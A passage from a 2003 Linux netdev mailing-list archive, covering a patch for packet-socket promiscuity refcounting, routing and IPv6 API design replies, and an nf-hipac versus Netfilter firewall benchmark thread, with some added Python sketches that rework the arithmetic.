problem is that packet sockets are calling dev_set_promiscuity too
many times.

For example, if I take an unconfigured interface and do:

halfoat:~ # ip link show eth1
9: eth1: mtu 1500 qdisc pfifo_fast qlen 100
    link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff
halfoat:~ # ip link set up eth1
halfoat:~ # tcpdump -i eth1 &
[1] 457
tcpdump: WARNING: eth1: no IPv4 address assigned
tcpdump: listening on eth1
halfoat:~ # ip link set down eth1
tcpdump: pcap_loop: recvfrom: Network is down
[1]+  Exit 1                  tcpdump -i eth1
halfoat:~ # ip link show eth1
9: eth1: mtu 1500 qdisc pfifo_fast qlen 100
    link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff

eth1 is now in promiscuous mode because dev->promiscuity is -1 (!= 0).

When the interface goes down, dev_change_flags calls dev_close, which
sends NETDEV_DOWN down the netdev notifier chain. Because tcpdump has a
packet socket open, packet_notifier calls
packet_dev_mclist -> packet_dev_mc -> dev_set_promiscuity.

When tcpdump gets ENETDOWN, it aborts, closing the packet socket.
af_packet.c's proto_ops->release cleanup method is packet_release. On
close(), packet_release calls packet_flush_mclist, which again
decrements dev->promiscuity, so when tcpdump exits, dev promiscuity is
left at -1.

I can't see any reason to be mucking about with the device promiscuity
on NETDEV_DOWN and NETDEV_UP events in the first place. The attached
patch seems to fix all the cases I can think of. It works properly in
both of the above cases, and has also been verified to do the right
thing with NETDEV_UNREGISTER events.
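
[Archive note] The arithmetic behind the "-1" above can be followed with a toy model. This is only a sketch in Python of the event sequence as the mail describes it, not kernel code: the function name promiscuity_after is made up, and it assumes tcpdump raised the count by one when it started listening.

```python
def promiscuity_after(adjust_on_down):
    """Toy model of dev->promiscuity across the tcpdump session above.

    adjust_on_down=True models the notifier also decrementing the count
    on NETDEV_DOWN; False models leaving the count alone on DOWN/UP.
    Hypothetical helper, not taken from af_packet.c.
    """
    promiscuity = 0
    promiscuity += 1      # tcpdump starts listening (assumed +1)
    if adjust_on_down:
        promiscuity -= 1  # NETDEV_DOWN: packet_notifier -> packet_dev_mclist(-1)
    promiscuity -= 1      # close(): packet_release -> packet_flush_mclist
    return promiscuity


if __name__ == "__main__":
    print("decrement on NETDEV_DOWN:", promiscuity_after(True))
    print("no change on NETDEV_DOWN:", promiscuity_after(False))
```

In this model the count only returns to zero when the socket's membership is dropped exactly once, which is the property the mail argues for.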

Jason

Index: linux-2.4/net/packet/af_packet.c
===================================================================
RCS file: /home/cvs/linux-2.4/net/packet/af_packet.c,v
retrieving revision 1.11
diff -u -p -r1.11 af_packet.c
--- linux-2.4/net/packet/af_packet.c	12 Jun 2002 23:10:34 -0000	1.11
+++ linux-2.4/net/packet/af_packet.c	1 Jul 2003 20:17:51 -0000
@@ -1378,8 +1378,13 @@ static int packet_notifier(struct notifi
 		po = sk->protinfo.af_packet;
 
 		switch (msg) {
-		case NETDEV_DOWN:
 		case NETDEV_UNREGISTER:
+#ifdef CONFIG_PACKET_MULTICAST
+			if (po->mclist)
+				packet_dev_mclist(dev, po->mclist, -1);
+			// fallthrough
+#endif
+		case NETDEV_DOWN:
 			if (dev->ifindex == po->ifindex) {
 				spin_lock(&po->bind_lock);
 				if (po->running) {
@@ -1396,10 +1401,6 @@ static int packet_notifier(struct notifi
 				}
 				spin_unlock(&po->bind_lock);
 			}
-#ifdef CONFIG_PACKET_MULTICAST
-			if (po->mclist)
-				packet_dev_mclist(dev, po->mclist, -1);
-#endif
 			break;
 		case NETDEV_UP:
 			spin_lock(&po->bind_lock);
@@ -1409,10 +1410,6 @@ static int packet_notifier(struct notifi
 				po->running = 1;
 			}
 			spin_unlock(&po->bind_lock);
-#ifdef CONFIG_PACKET_MULTICAST
-			if (po->mclist)
-				packet_dev_mclist(dev, po->mclist, +1);
-#endif
 			break;
 		}
 	}

From ja@ssi.bg Tue Jul 1 15:19:40 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 15:19:43 -0700 (PDT)
Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61MJa2x016593
    for ; Tue, 1 Jul 2003 15:19:38 -0700
Received: from localhost (IDENT:ja@localhost [127.0.0.1])
    by u.domain.uli (8.11.6/8.11.6) with ESMTP id h61MNQG02379;
    Wed, 2 Jul 2003 01:23:26 +0300
Date: Wed, 2 Jul 2003 01:23:25 +0300 (EEST)
From: Julian Anastasov
X-X-Sender: ja@u.domain.uli
To: Ben Greear
cc: netdev@oss.sgi.com
Subject: Re: send-to-self (was Re: routing bug report for 2.4)
In-Reply-To: <3F020610.2080109@candelatech.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 3714
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: ja@ssi.bg
Precedence: bulk
X-list: netdev

	Hello,

On Tue, 1 Jul 2003, Ben Greear wrote:

> How did you get telnet to bind to a particular local interface? Also, what

	I tested telnet with replacing the prefsrc, as result,
'ip route get telnet_server_ip_on_eth1' returns local_ip_from_eth0 as
src. telnetd listens as usually to 0.0.0.0, incoming connection comes
(IP1->IP2), so the server always gets two different IPs...

> ping syntax did you use? Did you have to modify either of these applications
> to get them to work?

	Nooo :) 'ping -I IP1 IP2' or if you set IP2's prefsrc to
IP1 then even 'ping IP2' works

> I looked at the patch...but don't have a good enough grasp of the routing
> code to provide a useful critique. I believe my patch _is_ smaller though ;)

	At least, we have two alternatives :) I'm still not sure
whether the "loop" feature will need some tuning in other netsource
places.

> Thanks,
> Ben

Regards

--
Julian Anastasov

From yoshfuji@linux-ipv6.org Tue Jul 1 17:17:34 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 17:17:47 -0700 (PDT)
Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h620HK2x019307
    for ; Tue, 1 Jul 2003 17:17:34 -0700
Received: from localhost (localhost [127.0.0.1])
    by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h620IRBo030900;
    Wed, 2 Jul 2003 09:18:27 +0900
Date: Wed, 02 Jul 2003 09:18:25 +0900 (JST)
Message-Id: <20030702.091825.72842784.yoshfuji@linux-ipv6.org>
To: krkumar@us.ibm.com
Cc: davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org,
    yoshfuji@linux-ipv6.org, kuznet@ms2.inr.ac.ru
Subject: Re: [PATCH] Prefix List against 2.5.70 (re-done)
From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=
In-Reply-To: <3F008771.5030206@us.ibm.com>
References: <20030627.144752.78715628.davem@redhat.com>
<20030628.130602.63704890.yoshfuji@linux-ipv6.org> <3F008771.5030206@us.ibm.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3715 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <3F008771.5030206@us.ibm.com> (at Mon, 30 Jun 2003 11:54:41 -0700), Krishna Kumar says: > Well, there are two reason that I can see to not do so (ADDRCONF flag is already > fixed in earlier patch) : : You do not explain why we (or kernel) NEED(s) this. It is not so important how SMALL it is though it may cause problems how LARGE it is. > About your point about the managed flag, I think it is a per interface flag > that gets returned when a request for getting flags on that interface is made. > That's why I have made it per interface as part of a GETLNKFLAGS operation. > I don't understand why you think it is NEWLINK thing (not sure what you mean by > that), since it is a flag information on your existing device that a RA is > advertising. I want to get this information not on receipt of an RA, but when > a request is made. This is a design issue: how we should provide L3 per-interface information to userspace; e.g. in_device and/or inet6_dev things including per-interface statistics. Since I think it is not appropriate to provide per-interface statistics via RTM_xxxROUTE, I don't agree to provide the RA information (i.e. Managed/Otherconf Flags) via RTM_xxxROUTE. 
Options: - use RTM_xxxLINK for L3 operation - introduce RTM_xxxIFACE for L3 per-interface operations I really want to hear from other maintainers here... David? Alexey? Well, on moving forward; you can split your patch up to 3 things: 1. fix routing flags 2. provide Managed/Otherconf flags API (3. provide the prefix list API (if it IS required)) I'm not against the first item. We need to discuss on the design related to the 2nd item. I don't think that we really need 3rd item. Thank you. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From kuznet@ms2.inr.ac.ru Tue Jul 1 22:17:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 22:17:45 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h625HX2x023753 for ; Tue, 1 Jul 2003 22:17:34 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id JAA05258; Wed, 2 Jul 2003 09:17:22 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307020517.JAA05258@dub.inr.ac.ru> Subject: Re: Fw: [PATCH 2.4.22-bk] dev->promiscuity refcounting broken in To: davem@redhat.com (David S. Miller) Date: Wed, 2 Jul 2003 09:17:22 +0400 (MSD) Cc: jmorris@redhat.com, netdev@oss.sgi.com, lunz@falooley.org In-Reply-To: <20030701.155051.104064679.davem@redhat.com> from "David S. Miller" at Jul 01, 2003 03:50:51 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3716 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > I can't see any reason to be mucking about with the device promiscuity > on NETDEV_DOWN and NETDEV_UP events in the first place. I do not remember why protocols (i.e. IP) withdraw multicast lists on device down too. 
:-) > The attached > patch seems to fix all the cases I can think of. I think it is right. Actually, if to follow the tradition, we could do the same thing as IP does (remembering that mc record is not loaded), but it looks really useless. Dave, the patch looks OK. Alexey PS. Wow! X-MIME-Autoconverted: from 8bit to quoted-printable by oss.sgi.com id h61MHp2x016322 X-MIME-Autoconverted: from quoted-printable to 8bit by devserv.devel.redhat.com id h61MI0K27113 Mime-Version: 1.0 (modified by Mew) Content-Transfer-Encoding: quoted-printable (modified by Mew) All three agents (oss, redhat and your mailer) are damn smart. Rare mail will pass through this uncorrupted, I guess. :-) From pekkas@netcore.fi Tue Jul 1 22:30:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 22:30:56 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h625UH2x024116 for ; Tue, 1 Jul 2003 22:30:18 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h625U7X23499; Wed, 2 Jul 2003 08:30:07 +0300 Date: Wed, 2 Jul 2003 08:30:07 +0300 (EEST) From: Pekka Savola To: Michael Bellion and Thomas Heinz cc: linux-kernel@vger.kernel.org, Subject: Re: [ANNOUNCE] nf-hipac v0.8 released In-Reply-To: <3EFF1349.6020802@hipac.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3717 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev Hi, Thanks for your clarification. We've also conducted some tests with bridging firewall functionality, and we're very pleased with nf-hipac's performance! Results below. 
In the measurements, tests were run through a bridging Linux firewall,
with a netperf UDP stream of 1450 byte packets (launched from a different
computer connected with gigabit ethernet), with a varying amount of
filtering rules checks for each packet.

I don't have the specs of the Linux PC hardware handy, but I recall
they're *very* highend dual-P4's, like 2.4Ghz, very fast PCI bus, etc.
Shouldn't be a factor here.

1. Filtering based on source address only, for example:

$fwcmd -A $MAIN -p udp -s 10.0.0.1 -j DROP
...
$fwcmd -A $MAIN -p udp -s 10.0.3.255 -j DROP
$fwcmd -A $MAIN -p udp -j ACCEPT

Results:

 rules |       plain NF      |       NF-HIPAC      |
       |   sent   | got thru |   sent   | got thru |
 (n.o) | (Mbit/s) | (Mbit/s) | (Mbit/s) | (Mbit/s) |
----------------------------------------------------
     0 |  956,00  |  953,24  |  956,00  |  953,24  |
   512 |  956,00  |  800,68  |  956,46  |  952,81  |
  1024 |  956,00  |  472,78  |  956,46  |  952,81  |
  2048 |  955,99  |  170,52  |  956,46  |  952,86  |
  3072 |  956,00  |   51,97  |  956,46  |  952,85  |

2. Filtering based on UDP protocol's source port, for example:

$fwcmd -A $MAIN -p udp --source-port 1 -j DROP
...
$fwcmd -A $MAIN -p udp --source-port 1024 -j DROP
$fwcmd -A $MAIN -p udp -j ACCEPT

Results:

 rules |       plain NF      |       NF-HIPAC      |
       |   sent   | got thru |   sent   | got thru |
 (n.o) | (Mbit/s) | (Mbit/s) | (Mbit/s) | (Mbit/s) |
----------------------------------------------------
     0 |  955,37  |  954,33  |  956,46  |  952,85  |
   512 |  980,68  |  261,41  |  956,46  |  951,92  |
  1024 |    N/A   |    N/A   |  956,47  |  952,86  |
  2048 |    N/A   |    N/A   |  956,46  |  952,85  |
  3072 |    N/A   |    N/A   |  956,46  |  952,85  |

N/A = Netfilter bridging can't handle this at all, no traffic can pass
the bridge.

So, plain Netfilter can tolerate about a couple of hundred rules checking
for addresses and/or ports on a gigabit line.

With HIPAC Netfilter, packet loss is very low, less than 0.5%, even with
the maximum number (of tested) rules, the same amount as without filtering
at all.
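The "less than 0.5%" figure can be checked directly against the tables above. The following is only a sketch of that arithmetic: the numbers are copied from the tables (decimal comma written as a decimal point), while the dictionary and function names are made up for illustration and do not come from netperf or nf-hipac.

```python
# Mbit/s figures copied from the result tables above; the decimal comma is
# written as a decimal point. All names here are illustrative assumptions.
# Each entry maps rule count -> (sent, got_through).
PLAIN_NF_BY_ADDRESS = {
    0: (956.00, 953.24),
    512: (956.00, 800.68),
    1024: (956.00, 472.78),
    2048: (955.99, 170.52),
    3072: (956.00, 51.97),
}
NF_HIPAC_BY_ADDRESS = {
    0: (956.00, 953.24),
    512: (956.46, 952.81),
    1024: (956.46, 952.81),
    2048: (956.46, 952.86),
    3072: (956.46, 952.85),
}
NF_HIPAC_BY_PORT = {
    0: (956.46, 952.85),
    512: (956.46, 951.92),
    1024: (956.47, 952.86),
    2048: (956.46, 952.85),
    3072: (956.46, 952.85),
}


def loss_percent(sent, got_through):
    """Share of the offered load that did not get through, in percent."""
    return 100.0 * (sent - got_through) / sent


def worst_loss(table):
    """Largest loss percentage over all rule counts in one table."""
    return max(loss_percent(sent, got) for sent, got in table.values())


for label, table in [
    ("plain NF, source address", PLAIN_NF_BY_ADDRESS),
    ("NF-HIPAC, source address", NF_HIPAC_BY_ADDRESS),
    ("NF-HIPAC, source port", NF_HIPAC_BY_PORT),
]:
    print(f"{label}: worst loss {worst_loss(table):.2f}%")
```

The plain Netfilter source-port table is left out because most of its rows are N/A.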
On Sun, 29 Jun 2003, Michael Bellion and Thomas Heinz wrote: > You wrote: > >>We are going to test the stuff tomorrow on an i386 and tell you > >>the results afterwards. > > Well, nf-hipac works fine together with the ebtables patch for 2.4.21 > on an i386 machine. We expect it to work with other patches too. > > >>In principle, nf-hipac should work properly whith the bridge patch. > >>We expect it to work just like iptables apart from the fact that > >>you cannot match on bridge ports. > > Well, this statement holds for the native nf-hipac in/out interface > match but of course you can match on bridge ports with nf-hipac > using the iptables physdev match. So everything should be fine :) > > > One obvious thing that's missing in your performance and Roberto's figures > > is what *exactly* are the non-matching rules. Ie. do they only match IP > > address, a TCP port, or what? (TCP port matching is about a degree of > > complexity more expensive with iptables, I recall.) > > [answered in private e-mail] > > > Regards, > > +-----------------------+----------------------+ > | Michael Bellion | Thomas Heinz | > | | | > +-----------------------+----------------------+ > > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From nf@hipac.org Wed Jul 2 05:27:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 05:27:19 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62CRB2x032309 for ; Wed, 2 Jul 2003 05:27:13 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h62CQwfZ012757; Wed, 2 Jul 2003 14:26:59 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id OAA27042; Wed, 2 Jul 2003 14:26:57 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de ([134.96.65.138] helo=e123.stw.stud.uni-saarland.de) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19XghM-0007HJ-00; Wed, 02 Jul 2003 14:26:56 +0200 From: Michael Bellion and Thomas Heinz Reply-To: nf@hipac.org To: Pekka Savola Subject: Re: [ANNOUNCE] nf-hipac v0.8 released Date: Wed, 2 Jul 2003 14:26:56 +0200 User-Agent: KMail/1.5.2 References: In-Reply-To: Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307021426.56138.nf@hipac.org> X-archive-position: 3718 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev Hi Pekka > Thanks for your clarification. We've also conducted some tests with > bridging firewall functionality, and we're very pleased with nf-hipac's > performance! Results below. Great, thanks a lot. Your tests are very interesting for us as we haven't done any gigabit or SMP tests yet. 
> In the measurements, tests were run through a bridging Linux firewall, > with a netperf UDP stream of 1450 byte packets (launched from a different > computer connected with gigabit ethernet), with a varying amount of > filtering rules checks for each packet. > I don't have the specs of the Linux PC hardware handy, but I recall > they're *very* highend dual-P4's, like 2.4Ghz, very fast PCI bus, etc. Since real world network traffic always consists of a lot of different sized packets, taking maximum sized packets is very euphemistic. 1450 byte packets at 950 Mbit/s correspond to approx. 80,000 packets/sec. We are really interested in how our algorithm performs at higher packet rates. Our performance tests are based on 100 Mbit hardware, so we couldn't test with more than approx. 80,000 packets/sec even with minimum sized packets. At this packet rate we were hardly able to drive the algorithm to its limit, even with more than 25000 rules involved (and our test system was a 1.3 GHz uniprocessor). We'd appreciate it very much if you could run additional tests with smaller packet sizes (including minimum packet size). This way we can get an idea of whether our SMP optimizations work and whether our algorithm in general would benefit from further fine tuning. 
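The packet-rate estimate above is link rate divided by packet size in bits. A minimal sketch of that calculation follows; the function name is hypothetical, and the result is an upper bound that ignores Ethernet preamble, inter-frame gap and any other framing overhead.

```python
def packets_per_second(link_bits_per_second, packet_bytes):
    """Upper bound on packet rate for a given link rate and packet size.

    Assumption: framing overhead (preamble, inter-frame gap, headers not
    counted in packet_bytes) is ignored, so real rates will be lower.
    """
    return link_bits_per_second / (packet_bytes * 8)


# 1450 byte packets at 950 Mbit/s, the case discussed above.
gigabit_rate = packets_per_second(950e6, 1450)

# 128 byte frames on 100 Mbit hardware, the case quoted later in the thread.
fast_ethernet_rate = packets_per_second(100e6, 128)

print(f"950 Mbit/s, 1450 bytes: {gigabit_rate:,.0f} packets/s")
print(f"100 Mbit/s,  128 bytes: {fast_ethernet_rate:,.0f} packets/s")
```

Both values land close to the rounded figures given in the thread, which suggests those figures were derived the same way.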
Regards +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ From P@draigBrady.com Wed Jul 2 06:14:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 06:14:59 -0700 (PDT) Received: from corvil.com (gate.corvil.net [213.94.219.177]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62DEj2x000525 for ; Wed, 2 Jul 2003 06:14:47 -0700 Received: from draigBrady.com (pixelbeat.local.corvil.com [172.18.1.170]) by corvil.com (8.12.9/8.12.5) with ESMTP id h62DEWlT084256; Wed, 2 Jul 2003 14:14:33 +0100 (IST) (envelope-from P@draigBrady.com) Message-ID: <3F02D964.7050301@draigBrady.com> Date: Wed, 02 Jul 2003 14:08:52 +0100 From: P@draigBrady.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030617 X-Accept-Language: en-us, en MIME-Version: 1.0 To: nf@hipac.org CC: Pekka Savola , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released References: <200307021426.56138.nf@hipac.org> In-Reply-To: <200307021426.56138.nf@hipac.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed X-MIME-Autoconverted: from 8bit to quoted-printable by corvil.com id h62DEWlT084256 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62DEj2x000525 X-archive-position: 3719 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: P@draigBrady.com Precedence: bulk X-list: netdev Michael Bellion and Thomas Heinz wrote: > Hi Pekka > > >>Thanks for your clarification. We've also conducted some tests with >>bridging firewall functionality, and we're very pleased with nf-hipac's >>performance! Results below. > > > Great, thanks a lot. Your tests are very interesting for us as we haven't done > any gigabit or SMP tests yet. 
> >>In the measurements, tests were run through a bridging Linux firewall, >>with a netperf UDP stream of 1450 byte packets (launched from a different >>computer connected with gigabit ethernet), with a varying amount of >>filtering rules checks for each packet. >>I don't have the specs of the Linux PC hardware handy, but I recall >>they're *very* highend dual-P4's, like 2.4Ghz, very fast PCI bus, etc. > > Since real world network traffic always consists of a lot of different sized > packets taking maximum sized packets is very euphemistic. 1450 byte packets > at 950 Mbit/s correspond to approx. 80,000 packets/sec. > We are really interested in how our algorithm performs at higher packet rates. > Our performance tests are based on 100 Mbit hardware so we coudn't test with > more than approx. 80,000 packets/sec even with minimum sized packets. Interrupt latency is the problem here. You'll require napi et. al to get over this hump. > At this > packet rate we were hardly able to drive the algorithm to its limit, even > with more than 25000 rules involved (and our test system was 1.3 GHz > uniprocessor). Cool. The same sort of test with ordinary netfilter that I did showed it could only handle around 125 rules at this packet rate on a 1.4GHz PIII, e1000 @ 100Mb/s. 
# ./readprofile -m /boot/System.map | sort -nr | head -30 6779 total 0.0047 4441 default_idle 69.3906 787 handle_IRQ_event 7.0268 589 ip_packet_match 1.6733 433 ipt_do_table 0.6294 106 eth_type_trans 0.5521 56 kfree 0.8750 46 skb_release_data 0.3194 37 add_timer_randomness 0.1542 35 alloc_skb 0.0781 30 __kmem_cache_alloc 0.1172 27 kmalloc 0.3375 23 ip_rcv 0.0342 22 do_gettimeofday 0.1964 20 netif_rx 0.0521 19 __kfree_skb 0.0540 18 add_entropy_words 0.1023 15 __constant_c_and_count_memset 0.0938 13 batch_entropy_store 0.0813 12 kfree_skbmem 0.1071 11 netif_receive_skb 0.0208 7 nf_iterate 0.0437 7 nf_hook_slow 0.0175 6 process_backlog 0.0221 5 batch_entropy_process 0.0223 5 add_interrupt_randomness 0.0781 3 kmem_cache_free 0.0625 2 ipt_hook 0.0312 1 write_profile 0.0156 1 ip_promisc_rcv_finish 0.0208 Pádraig. From nf@hipac.org Wed Jul 2 06:48:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 06:48:39 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62DmT2x001337 for ; Wed, 2 Jul 2003 06:48:30 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h62DmLfZ032855; Wed, 2 Jul 2003 15:48:21 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id PAA113215; Wed, 2 Jul 2003 15:48:20 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de ([134.96.65.138] helo=e123.stw.stud.uni-saarland.de) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19Xhy8-0007Pk-00; Wed, 02 Jul 2003 15:48:20 +0200 From: Michael Bellion and Thomas Heinz Reply-To: nf@hipac.org To: P@draigbrady.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released Date: Wed, 2 Jul 2003 15:48:19 +0200 User-Agent: KMail/1.5.2 References: <200307021426.56138.nf@hipac.org> 
<3F02D964.7050301@draigBrady.com> In-Reply-To: <3F02D964.7050301@draigBrady.com> Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Message-Id: <200307021548.19989.nf@hipac.org> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62DmT2x001337 X-archive-position: 3720 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev Hi Pádraig > > Since real world network traffic always consists of a lot of different > > sized packets taking maximum sized packets is very euphemistic. 1450 byte > > packets at 950 Mbit/s correspond to approx. 80,000 packets/sec. > > We are really interested in how our algorithm performs at higher packet > > rates. Our performance tests are based on 100 Mbit hardware so we coudn't > > test with more than approx. 80,000 packets/sec even with minimum sized > > packets. > > Interrupt latency is the problem here. You'll require napi et. al > to get over this hump. Yes we know, but with 128 byte frame size you can achieve a packet rate of at most 97,656 packets/sec (in theory) on 100 Mbit hardware. We don't think these few more packets would have changed the results fundamentally, so it's probably not worth it on 100 Mbit. Certainly you are right that napi is required on gigabit to saturate the link with small sized packets. > Cool. The same sort of test with ordinary netfilter that > I did showed it could only handle around 125 rules at this > packet rate on a 1.4GHz PIII, e1000 @ 100Mb/s. > > # ./readprofile -m /boot/System.map | sort -nr | head -30 > 6779 total 0.0047 > 4441 default_idle 69.3906 > 787 handle_IRQ_event 7.0268 > 589 ip_packet_match 1.6733 > 433 ipt_do_table 0.6294 > 106 eth_type_trans 0.5521 > [...] What do you want to show with this profile? 
Most of the time is spent in the idle loop and in irq handling and only a few percent in ip_packet_match and ipt_do_table, so we don't quite get how this matches your statement above. Could you explain this in a few words? Regards, +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ From or@logreport.org Wed Jul 2 07:00:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:00:28 -0700 (PDT) Received: from hibou.logreport.org (postfix@logreport.IAE.nl [212.61.24.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62E0N2x001805 for ; Wed, 2 Jul 2003 07:00:24 -0700 Received: by hibou.logreport.org (Postfix, from userid 1005) id CBEC3C052; Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Type: text/plain; name="lr_log2mail.common.lr_tag-20030702160003-4776.4NuBoD.errors" Content-Disposition: inline; filename="lr_log2mail.common.lr_tag-20030702160003-4776.4NuBoD.errors" MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) To: netdev@oss.sgi.com From: log@logreport.org Subject: [LogReport] Error in common report (was: [LogReport] common report (was: Re: Movie)) Reply-To: support@logreport.org Message-Id: <20030702140021.CBEC3C052@hibou.logreport.org> Date: Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62E0N2x001805 X-archive-position: 3721 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: log@logreport.org Precedence: bulk X-list: netdev WARNING: Logfile may be bogus. There were 319 errors on the 319 lines in the log. This may be because you sent a log file that doesn't strictly contain common logs. This is probable if you sent a syslog log file without filtering it to keep only the logs relevant to the common service. 
